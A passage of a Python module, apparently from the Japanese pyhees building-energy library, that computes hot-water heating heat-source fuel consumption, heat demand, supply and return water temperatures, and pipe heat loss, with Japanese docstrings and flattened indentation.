# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_gas.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 戻り温水温度
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 温水暖房用熱源機の定格能力 (W)
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
E_G_hs = hs_gas.calc_E_G_hs(
e_rtd=e_rtd,
q_rtd_hs=q_rtd_hs,
Q_out_H_hs=Q_out_H_hs,
hs_type=hs_type,
P_hs=p_hs,
)
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
E_G_hs = hs_eheater.get_E_G_hs()
elif hs_type == '電気ヒートポンプ温水暖房機':
E_G_hs = hs_ehpump.get_E_G_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
# 外気温
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
X_ex = get_X_ex(region, outdoor)
h_ex = calc_h_ex(X_ex, Theta_ex)
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 戻り温水温度
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A,
A_MR, A_OR, region, mode_MR, mode_OR,
L_T_H_rad)
E_G_hs = hs_gas_hybrid.calc_E_G_hs(
Theta_ex=Theta_ex,
Theta_SW_d_t=Theta_SW_d_t,
Theta_RW_hs=Theta_RW_hs,
TU_place=H_HS['TU_place'],
Q_dmd_H_hs_d_t=Q_dmd_H_hs_d_t
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
# 温水暖房用熱源機の温水熱需要
Q_dmd_H_hs_d_t = calc_Q_dmd_H_hs_d_t(rad_list, H_HS['pipe_insulation'], H_HS['underfloor_pipe_insulation'],
Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
# 定格能力の計算のためのパラメータの取得
rad_types = get_rad_type_list()
has_MR_hwh = H_MR['type'] in rad_types
if H_OR is not None:
has_OR_hwh = H_OR['type'] in rad_types
else:
has_OR_hwh = False
# 温水暖房熱源機の定格能力
q_rtd_hs = hs_gas.calc_q_rtd_hs(region, A_A, A_MR, A_OR, mode_MR, mode_OR, has_MR_hwh, has_OR_hwh)
# 最大暖房出力
Q_max_H_hs_d_t = hs_gas.get_Q_max_H_hs(q_rtd_hs)
# 温水暖房用熱源機の暖房出力
Q_out_H_hs = get_Q_out_H_hs_d_t(Q_dmd_H_hs_d_t, Q_max_H_hs_d_t)
# 戻り温水温度
Theta_RW_hs = calc_Theta_RW_hs_d_t(Theta_SW_d_t, rad_list, H_HS['pipe_insulation'],
H_HS['underfloor_pipe_insulation'], A_A, A_MR, A_OR, region,
mode_MR, mode_OR, L_T_H_rad)
E_G_hs = hs_hybrid_gas.calc_E_G_hs(
q_rtd_hs=q_rtd_hs,
Q_out_H_hs=Q_out_H_hs,
P_hs=p_hs
)
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
E_G_hs = hs_whybrid.get_E_G_hs()
elif hs_type == 'コージェネレーションを使用する':
E_G_hs = np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
E_G_hs = hs_ghpump.get_E_G_hs_d_t()
else:
raise ValueError(hs_type)
print('{} E_G_hs = {} [MJ] (L_T_H_rad = {} [MJ])'.format(hs_type, np.sum(E_G_hs), np.sum(L_T_H_rad)))
return E_G_hs
def get_E_M_hs_d_t(H_HS):
"""温水暖房用熱源機のその他の燃料による一次エネルギー消費量
Args:
H_HS(dict): 温水暖房機の仕様
Returns:
ndarray: 温水暖房用熱源機のその他の燃料による一次エネルギー消費量
"""
hs_type = H_HS['type']
if hs_type in ['石油温水暖房機', '石油給湯温水暖房機', '石油従来型温水暖房機', '石油従来型給湯温水暖房機', '石油潜熱回収型温水暖房機', '石油潜熱回収型給湯温水暖房機']:
return hs_oil.get_E_M_hs()
elif hs_type in ['ガス温水暖房機', 'ガス給湯温水暖房機', 'ガス従来型温水暖房機', 'ガス従来型給湯温水暖房機', 'ガス潜熱回収型温水暖房機', 'ガス潜熱回収型給湯温水暖房機']:
return hs_gas.get_E_M_hs()
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
return hs_eheater.get_E_M_hs()
elif hs_type == '電気ヒートポンプ温水暖房機':
return hs_ehpump.get_E_M_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return hs_gas_hybrid.get_E_M_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or \
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
return hs_hybrid_gas.calc_E_M_hs()
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return hs_whybrid.get_E_M_hs()
elif hs_type == 'コージェネレーションを使用する':
return np.zeros(24 * 365)
elif hs_type == '地中熱ヒートポンプ温水暖房機':
return hs_ghpump.get_E_M_hs_d_t()
else:
raise ValueError(hs_type)
# ============================================================================
# 7.2 暖房出力
# ============================================================================
def calc_Q_dmd_H_hs_d_t(rad_list, pipe_insulation, underfloor_pipe_insulation, Theta_SW_d_t, A_A, A_MR, A_OR, region,
mode_MR, mode_OR,
L_T_H_rad_d_t):
"""温水暖房用熱源機の温水熱需要 (6)
Args:
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
pipe_insulation(bool): 配管断熱の有無
underfloor_pipe_insulation(bool): 床下配管断熱の有無
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
        L_T_H_rad_d_t(ndarray): 放熱器の暖房負荷
Returns:
ndarray: 温水暖房用熱源機の温水熱需要
"""
MR_rad_type, r_Af_1 = get_MR_rad_type_and_r_Af_1(rad_list)
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
Q_dmd_H_hs_d_t = np.zeros_like(Theta_SW_d_t)
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad_d_t_i = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad_d_t[i - 1])
# 1時間当たりの暖冷房区画iに設置された放熱器の温水供給運転率
r_WS_rad_d_t_i = calc_r_WS_rad_d_t_i(
A_HCZ=A_HCZ,
radiator=rad_list[i - 1],
Q_T_H_rad=Q_T_H_rad_d_t_i,
Theta_SW=Theta_SW_d_t,
region=region,
mode=mode,
R_type=R_type
)
Q_dmd_H_ln_d_t_i = calc_Q_dmd_H_ln_d_t_i(
i=i,
radiator=rad_list[i - 1],
Q_T_H_rad_d_t_i=Q_T_H_rad_d_t_i,
Q_max_H_rad_d_t_i=Q_max_H_rad_d_t_i,
L_T_H_rad_d_t_i=L_T_H_rad_d_t[i - 1],
Theta_SW_d_t=Theta_SW_d_t,
Theta_ex=Theta_ex,
r_WS_rad_d_t_i=r_WS_rad_d_t_i,
A_A=A_A,
pipe_insulation=pipe_insulation,
underfloor_pipe_insulation=underfloor_pipe_insulation,
MR_rad_type=MR_rad_type,
r_Af_1=r_Af_1
)
Q_dmd_H_hs_d_t = Q_dmd_H_hs_d_t + Q_dmd_H_ln_d_t_i
return Q_dmd_H_hs_d_t
def get_MR_rad_type_and_r_Af_1(rad_list):
"""主たる居室の放熱機器と当該住戸における温水床暖房の敷設率 (-)
Args:
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
Returns:
tuple: 主たる居室の放熱機器と当該住戸における温水床暖房の敷設率 (-)
"""
if rad_list[0] is not None:
MR_rad_type = rad_list[0]['type']
if 'r_Af' in rad_list[0]:
r_Af_1 = rad_list[0]['r_Af']
else:
r_Af_1 = None
else:
MR_rad_type = None
r_Af_1 = None
return MR_rad_type, r_Af_1
# ============================================================================
# 7.3 温水供給運転率
# ============================================================================
def calc_r_WS_hs_d_t(rad_list, Q_dmd_H_hs_d_t, Q_T_H_rad, Theta_SW, region, A_A, A_MR, A_OR, mode_MR):
"""温水暖房用熱源機の温水供給運転率
Args:
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
Q_dmd_H_hs_d_t(ndarray): 1時間当たりの熱源機の熱需要 (MJ/h)
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Theta_SW(ndarray): 往き温水温度 (℃)
region(int): 省エネルギー地域区分
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
mode_MR(str): 運転モード 'い', 'ろ', 'は'
Returns:
ndarray: 温水暖房用熱源機の温水供給運転率
"""
# (7a)
n = sum([rad is not None for rad in rad_list]) # 放熱系統数
if n == 1:
A_HCZ = calc_A_HCZ_i(1, A_A, A_MR, A_OR)
radiator = rad_list[0]
R_type = '主たる居室'
tmp = calc_r_WS_ln_d_t_i(A_HCZ, radiator, Q_T_H_rad[0], Theta_SW, region, mode_MR, R_type)
elif n > 1:
tmp = np.ones(24 * 365)
else:
raise ValueError(n)
# (7b)
tmp[Q_dmd_H_hs_d_t == 0] = 0
return tmp
# ============================================================================
# 7.4 往き温水温度
# ============================================================================
def get_Theta_SW_hs_op(hs_type, CG=None):
"""温水暖房用熱源機の往き温水温度の候補
Args:
hs_type(str): 温水暖房用熱源機の種類
CG(dict, optional): コージェネレーションの機器 (Default value = None)
Returns:
tuple: 温水暖房用熱源機の往き温水温度の候補
"""
if hs_type == '石油従来型温水暖房機' or hs_type == '石油従来型給湯温水暖房機':
return get_table_4()[0]
elif hs_type == '石油潜熱回収型温水暖房機' or hs_type == '石油潜熱回収型給湯温水暖房機':
return get_table_4()[1]
elif hs_type == 'ガス従来型温水暖房機' or hs_type == 'ガス従来型給湯温水暖房機' or hs_type == 'ガス従来型' or hs_type == 'G_NEJ':
return get_table_4()[2]
elif hs_type == 'ガス潜熱回収型温水暖房機' or hs_type == 'ガス潜熱回収型給湯温水暖房機' or hs_type == 'ガス潜熱回収型' or hs_type == 'G_EJ':
return get_table_4()[3]
elif hs_type == '電気ヒーター温水暖房機' or hs_type == '電気ヒーター給湯温水暖房機':
return get_table_4()[4]
elif hs_type == '電気ヒートポンプ温水暖房機':
return get_table_4()[5]
elif hs_type == '地中熱ヒートポンプ温水暖房機':
return get_table_4()[6]
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:ガス瞬間式、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return get_table_4()[7]
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(試験された値を用いる)' or\
hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:ガス瞬間式)(仕様による)':
return get_table_4()[8]
elif hs_type == '電気ヒートポンプ・ガス瞬間式併用型給湯温水暖房機(給湯熱源:電気ヒートポンプ・ガス瞬間式併用、暖房熱源:電気ヒートポンプ・ガス瞬間式併用)':
return get_table_4()[9]
elif hs_type == 'コージェネレーションを使用する':
from pyhees.section8_a import get_type_BB_HWH
if 'CG_category' in CG:
type_BB_HWH = get_type_BB_HWH(CG['CG_category'])
else:
type_BB_HWH = CG['type_BB_HWH']
return get_Theta_SW_hs_op(type_BB_HWH)
elif hs_type == '給湯・温水暖房一体型を使用する':
raise NotImplementedError()
else:
raise ValueError(hs_type)
def calc_p_hs_d_t(Theta_SW_hs_op, rad_list, L_T_H_rad, A_A, A_MR, A_OR, region, mode_MR, mode_OR):
"""温水暖房用熱源機の往き温水温度の区分 (8)
Args:
Theta_SW_hs_op(tuple): 温水暖房用熱源機の往き温水温度の候補
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
L_T_H_rad(ndarray): 放熱器の暖房負荷
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
Returns:
ndarray: 温水暖房用熱源機の往き温水温度の区分 (8)
"""
p_ln = np.zeros((5, 24 * 365), dtype=np.int32)
# 初期値として、最低温度を指定
p_ln[:] = len(Theta_SW_hs_op)
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is not None:
A_HCZ_i = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
mode = mode_MR if i == 1 else mode_OR
R_type = '主たる居室' if i == 1 else 'その他の居室'
p_ln_i = calc_p_ln_d_t_i(rad_list[i - 1], L_T_H_rad[i - 1], Theta_SW_hs_op, A_HCZ_i, region, mode, R_type)
p_ln[i - 1, :] = p_ln_i
return np.min(p_ln, axis=0)
def get_Theta_SW_d_t(Theta_SW_hs_op, p_hs_d_t):
"""要求往き温水温度
Args:
Theta_SW_hs_op(tuple): 温水暖房用熱源機の往き温水温度の候補
p_hs_d_t(ndarray): 温水暖房用熱源機の往き温水温度
Returns:
ndarray: 要求往き温水温度
"""
# 一括変換用のndarrayを作成
n = len(Theta_SW_hs_op)
array_Theta_SW_hs_op = np.array(Theta_SW_hs_op).reshape((n, 1))
# p_d_tに基づいて1時間当たりの往き温水温度を取得
Theta_SW_d_t = array_Theta_SW_hs_op[p_hs_d_t - 1]
return Theta_SW_d_t.reshape(p_hs_d_t.shape)
def get_table_4():
"""表4 温水暖房用熱源機における往き温水温度の区分及び候補
Args:
Returns:
list: 表4 温水暖房用熱源機における往き温水温度の区分及び候補
"""
table_4 = [
(60,),
(60, 40),
(60,),
(60, 40),
(60,),
(55, 45, 35),
(55, 45, 35),
(60, 40),
(60, 40),
(60, 40),
]
return table_4
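# --- 参考: 往き温水温度の決定例(解説用に追記。熱源機の種類と区分の値は仮定) ---
#   >>> Theta_SW_hs_op = get_Theta_SW_hs_op('電気ヒートポンプ温水暖房機')  # (55, 45, 35)
#   >>> get_Theta_SW_d_t(Theta_SW_hs_op, np.array([1, 2, 3]))
#   区分 p = 1, 2, 3 がそれぞれ 55, 45, 35 ℃ に対応する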
# ============================================================================
# 7.5 戻り温水温度
# ============================================================================
def calc_Theta_RW_hs_d_t(Theta_SW_hs_d_t, rad_list, pipe_insulation, underfloor_pipe_insulation, A_A, A_MR, A_OR, region,
mode_MR, mode_OR,
L_T_H_rad):
"""戻り温水温度 (9)
Args:
Theta_SW_hs_d_t(ndarray): 温水暖房用熱源機の往き温水温度
rad_list(list: list: list): 放熱機器の暖房区画ごとの配列
pipe_insulation(bool): 配管断熱の有無
underfloor_pipe_insulation(bool): 床下配管断熱の有無
A_A(float): 床面積の合計 (m2)
A_MR(float): 主たる居室の床面積 (m2)
A_OR(float): その他の居室の床面積 (m2)
region(int): 省エネルギー地域区分
mode_MR(str): 主たる居室の運転モード 'い', 'ろ', 'は'
mode_OR(str): その他の居室の運転モード 'い', 'ろ', 'は'
L_T_H_rad(ndarray): 放熱器の暖房負荷
Returns:
ndarray: 戻り温水温度 (9)
"""
MR_rad_type, r_Af_1 = get_MR_rad_type_and_r_Af_1(rad_list)
outdoor = load_outdoor()
Theta_ex = get_Theta_ex(region, outdoor)
Q_dmd_H_ln_d_t = np.zeros((5, 24 * 365))
Q_dash_max_H_rad_d_t = np.zeros((5, 24 * 365))
for i in [1, 3, 4, 5]:
if rad_list[i - 1] is None:
continue
else:
if rad_list[i - 1] is None:
continue
# 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
A_HCZ = calc_A_HCZ_i(i, A_A, A_MR, A_OR)
R_type = '主たる居室' if i == 1 else 'その他の居室'
mode = mode_MR if i == 1 else mode_OR
Q_max_H_rad_d_t_i = calc_Q_max_H_rad_d_t_i(rad_list[i - 1], A_HCZ, Theta_SW_hs_d_t, region, mode, R_type)
# 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad_d_t_i = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i, L_T_H_rad[i - 1])
# 1時間当たりの暖冷房区画iに設置された放熱器の温水供給運転率
r_WS_rad_d_t_i = calc_r_WS_rad_d_t_i(
A_HCZ=A_HCZ,
radiator=rad_list[i - 1],
Q_T_H_rad=Q_T_H_rad_d_t_i,
Theta_SW=Theta_SW_hs_d_t,
region=region,
mode=mode,
R_type=R_type
)
Q_dmd_H_ln_d_t[i - 1] = calc_Q_dmd_H_ln_d_t_i(
i=i,
radiator=rad_list[i - 1],
Q_T_H_rad_d_t_i=Q_T_H_rad_d_t_i,
Q_max_H_rad_d_t_i=Q_max_H_rad_d_t_i,
L_T_H_rad_d_t_i=L_T_H_rad[i - 1],
Theta_SW_d_t=Theta_SW_hs_d_t,
Theta_ex=Theta_ex,
r_WS_rad_d_t_i=r_WS_rad_d_t_i,
A_A=A_A,
pipe_insulation=pipe_insulation,
underfloor_pipe_insulation=underfloor_pipe_insulation,
MR_rad_type=MR_rad_type,
r_Af_1=r_Af_1
)
Q_dash_max_H_rad_d_t_i = get_Q_dash_max_H_rad_d_t_i(Q_max_H_rad_d_t_i, Q_dmd_H_ln_d_t[i - 1])
Q_dash_max_H_rad_d_t[i - 1, :] = Q_dash_max_H_rad_d_t_i
# 1時間ごとの対数平均温度差 (9b)
T_dif = get_T_dif_d_t(Q_dmd_H_ln_d_t, Q_dash_max_H_rad_d_t)
# 温水暖房用熱源機の戻り温水温度 (9a)
Theta_RW_hs_d_t = np.zeros(24 * 365)
# - 条件1 (熱源機の往き温水温度60度)
f1 = (Theta_SW_hs_d_t == 60)
Theta_RW_hs_d_t[f1] = 0.0301 * T_dif[f1] ** 2 - 0.1864 * T_dif[f1] + 20
# - 条件2 (熱源機の往き温水温度40度)
f2 = (Theta_SW_hs_d_t == 40)
Theta_RW_hs_d_t[f2] = 0.0604 * T_dif[f2] ** 2 - 0.1881 * T_dif[f2] + 20
# 温水暖房用戻り温度は往き温度を超えない
    fover = (Theta_RW_hs_d_t > Theta_SW_hs_d_t)  # 戻り温水温度が往き温水温度を超える日時のインデックス
    Theta_RW_hs_d_t[fover] = Theta_SW_hs_d_t[fover]  # 逆転している日時に限り、戻り温度 = 往き温度とする
return Theta_RW_hs_d_t
def get_Q_dash_max_H_rad_d_t_i(Q_max_H_rad_d_t_i, Q_dmd_H_ln_d_t_i):
"""1時間当たりの温水熱需要が発生する場合の暖冷房区画iに設置された放熱器の最大暖房出力 (9c)
Args:
Q_max_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
Q_dmd_H_ln_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の放熱系統の温水熱需要
Returns:
ndarray: 1時間当たりの温水熱需要が発生する場合の暖冷房区画iに設置された放熱器の最大暖房出力 (9c)
"""
Q_dash_max_H_rad_d_t_i = np.copy(Q_max_H_rad_d_t_i)
Q_dash_max_H_rad_d_t_i[Q_dmd_H_ln_d_t_i == 0] = 0
return Q_dash_max_H_rad_d_t_i
def get_T_dif_d_t(Q_dmd_H_ln_d_t, Q_dash_max_H_rad_d_t):
"""1時間ごとの対数平均温度差 (9b)
Args:
Q_dmd_H_ln_d_t(ndarray): 1時間当たりの放熱系統の温水熱需要
Q_dash_max_H_rad_d_t(ndarray): 1時間当たりの放熱器の最大暖房出力
Returns:
ndarray: 1時間ごとの対数平均温度差 (9b)
"""
Q_dmd = np.sum(Q_dmd_H_ln_d_t, axis=0)
Q_dash_max = np.sum(Q_dash_max_H_rad_d_t, axis=0)
T_dif_d_t = np.zeros(24 * 365)
f = (Q_dmd > 0)
T_dif_d_t[f] = Q_dmd[f] / (Q_dash_max[f] * 0.027583)
return T_dif_d_t
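# --- 参考: 式(9a)の検算例(解説用に追記。対数平均温度差 T_dif = 20 は仮定値) ---
#   往き温水温度 60 ℃ のとき Theta_RW_hs = 0.0301 * 20 ** 2 - 0.1864 * 20 + 20 ≒ 28.3 ℃
#   戻り温度が往き温度を上回る場合は往き温度で頭打ちとする(上記 calc_Theta_RW_hs_d_t の最終段を参照)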
# ============================================================================
# 8. 放熱系統
# ============================================================================
# ============================================================================
# 8.1 温水熱需要
# ============================================================================
def calc_Q_dmd_H_ln_d_t_i(i, radiator, Q_T_H_rad_d_t_i, Q_max_H_rad_d_t_i, L_T_H_rad_d_t_i, Theta_SW_d_t, Theta_ex,
r_WS_rad_d_t_i, A_A, pipe_insulation, underfloor_pipe_insulation,
MR_rad_type, r_Af_1):
"""1時間当たりの放熱系統iの温水熱需要 (10)
Args:
i(int): 暖冷房区画i
radiator(dict): 放熱器仕様
Q_T_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_max_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の最大暖房出力
L_T_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の暖房負荷
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
        Theta_ex(ndarray): 外気温度 (℃)
r_WS_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された温水床暖房の温水供給運転率
A_A(float): 床面積の合計 (m2)
pipe_insulation(bool): 配管断熱の有無
underfloor_pipe_insulation(bool): 床下配管断熱の有無
MR_rad_type(str): 主たる居室の放熱器の種類
r_Af_1(float): 当該住戸における温水床暖房の敷設率 (-)
Returns:
ndarray: 1時間当たりの放熱系統iの温水熱需要 (10)
"""
# 1時間当たりの暖冷房区画iに設置された放熱器の温水熱需要
Q_dmd_H_rad_d_t_i = calc_Q_dmd_H_rad_d_t_i(radiator, Q_max_H_rad_d_t_i, L_T_H_rad_d_t_i)
# 1時間当たりの配管iの熱損失
Q_loss_pp_d_t_i = calc_Q_loss_pp_d_t_i(
i=i,
Theta_SW_d_t=Theta_SW_d_t,
Theta_ex_d_t=Theta_ex,
r_WS_rad_d_t_i=r_WS_rad_d_t_i,
A_A=A_A,
pipe_insulation=pipe_insulation,
underfloor_pipe_insulation=underfloor_pipe_insulation,
MR_rad_type=MR_rad_type,
r_Af_1=r_Af_1
)
return Q_dmd_H_rad_d_t_i + Q_loss_pp_d_t_i
# ============================================================================
# 8.2 温水供給運転率
# ============================================================================
def calc_r_WS_ln_d_t_i(A_HCZ, radiator, Q_T_H_rad, Theta_SW, region, mode, R_type):
"""放熱系統iの温水供給運転率 (11)
Args:
A_HCZ(float): 暖冷房区画の床面積
radiator(dict): 放熱器仕様
Q_T_H_rad(ndarray): 放熱器の処理暖房負荷
Theta_SW(ndarray): 往き温水温度 (℃)
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
tuple: 放熱系統iの温水供給運転率 (11)
"""
return calc_r_WS_rad_d_t_i(A_HCZ, radiator, Q_T_H_rad, Theta_SW, region, mode, R_type)
# ============================================================================
# 8.3 要求往き温水温度の区分
# ============================================================================
def calc_p_ln_d_t_i(radiator, L_T_H_rad_d_t_i, Theta_SW_hs_op, A_HCZ, region, mode, R_type):
"""放熱系統の要求往き温水温度の区分
Args:
radiator(dict): 放熱器仕様
L_T_H_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された放熱器の暖房負荷
Theta_SW_hs_op(tuple): 温水暖房用熱源機の往き温水温度の候補
A_HCZ(float): 暖冷房区画の床面積
region(int): 省エネルギー地域区分
mode(str): 運転モード 'い', 'ろ', 'は'
R_type(string): 居室の形式
Returns:
float: 放熱系統の要求往き温水温度の区分
"""
n = len(Theta_SW_hs_op)
if n == 1:
# 候補が1つの場合は決定
return np.ones(24 * 365)
else:
# 候補が2つ以上の場合は未処理負荷の発生状況を確認
        # 放熱器がない暖房区画が指定された場合は便宜上、最低の温水温度の区分を返す
if radiator is None:
return n * np.ones(24 * 365)
# 往き温水温度の候補ごとに未処理負荷の発生状況を確認する
# このとき、最大の往き温水温度の候補(p=1)は確認をしない
flag_UT_d_t_p = np.ones((n - 1, 24 * 365)) # 基本はp=1
for p in range(2, n + 1):
# 往き温水温度の候補p
Theta_SW = Theta_SW_hs_op[p - 1]
# 往き温水温度の候補pにおける放熱器の最大出力
Q_max_H_rad_d_t_i_p = calc_Q_max_H_rad_d_t_i(radiator, A_HCZ, Theta_SW, region, mode, R_type)
# 往き温水温度の候補pにおける1時間当たりの暖冷房区画iに設置された放熱器の処理暖房負荷
Q_T_H_rad_d_t_i_p = calc_Q_T_H_rad_d_t_i(Q_max_H_rad_d_t_i_p, L_T_H_rad_d_t_i)
# 往き温水温度の候補pにおける1時間当たりの暖冷房区画iに設置された放熱器の未処理暖房負荷
Q_UT_H_rad_d_t_i_p = L_T_H_rad_d_t_i - Q_T_H_rad_d_t_i_p
# 未処理負荷が発生しなかった時刻にはpを保存
flag_UT_d_t_i_p = Q_UT_H_rad_d_t_i_p <= 0.0
flag_UT_d_t_p[p - 2][flag_UT_d_t_i_p] = p
# 1時間当たりの往き温水温度の候補p
p_ln_d_t_i = np.max(flag_UT_d_t_p, axis=0)
return p_ln_d_t_i
# ===========================================================================
# 9. 配管
# ============================================================================
def calc_Q_loss_pp_d_t_i(i, Theta_SW_d_t, Theta_ex_d_t, r_WS_rad_d_t_i, A_A, pipe_insulation, underfloor_pipe_insulation,
MR_rad_type, r_Af_1):
"""1時間当たりの配管iの熱損失 (12)
Args:
i(int): 暖冷房区画の番号
Theta_SW_d_t(ndarray): 往き温水温度 (℃)
Theta_ex_d_t(ndarray): 外気温度(℃)
r_WS_rad_d_t_i(ndarray): 1時間当たりの暖冷房区画iに設置された温水床暖房の温水供給運転率
A_A(float): 床面積の合計 (m2)
pipe_insulation(bool): 配管断熱の有無
underfloor_pipe_insulation(bool): 床下配管断熱の有無
MR_rad_type(str): 主たる居室の放熱器の種類
r_Af_1(float): 当該住戸における温水床暖房の敷設率 (-)
Returns:
ndarray: 1時間当たりの配管iの熱損失 (12)
"""
# 配管の断熱区画外における長さ
L_pp_ex_i = pipe.calc_L_pp_ex_i(i, A_A, underfloor_pipe_insulation, MR_rad_type, r_Af_1)
# 配管の断熱区画内における長さ
L_pp_in_i = pipe.calc_L_pp_in_i(i, A_A, underfloor_pipe_insulation, MR_rad_type, r_Af_1)
# 線熱損失係数
K_loss_pp_i = pipe.get_K_loss_pp(pipe_insulation)
return ((Theta_SW_d_t - (Theta_ex_d_t * 0.7 + 20 * 0.3)) * L_pp_ex_i + (Theta_SW_d_t - 20) * L_pp_in_i) \
* K_loss_pp_i * r_WS_rad_d_t_i * 3600 * 10 ** (-6)
# ***************************************************************************
# 10. 放熱器
# ***************************************************************************
# ============================================================================
# 10.1 供給熱量
# ============================================================================
def calc_Q_dmd_H_rad_d_t_i(radiator, Q_max_H_rad_d_t_i, L_T_H_rad_d_t_i):
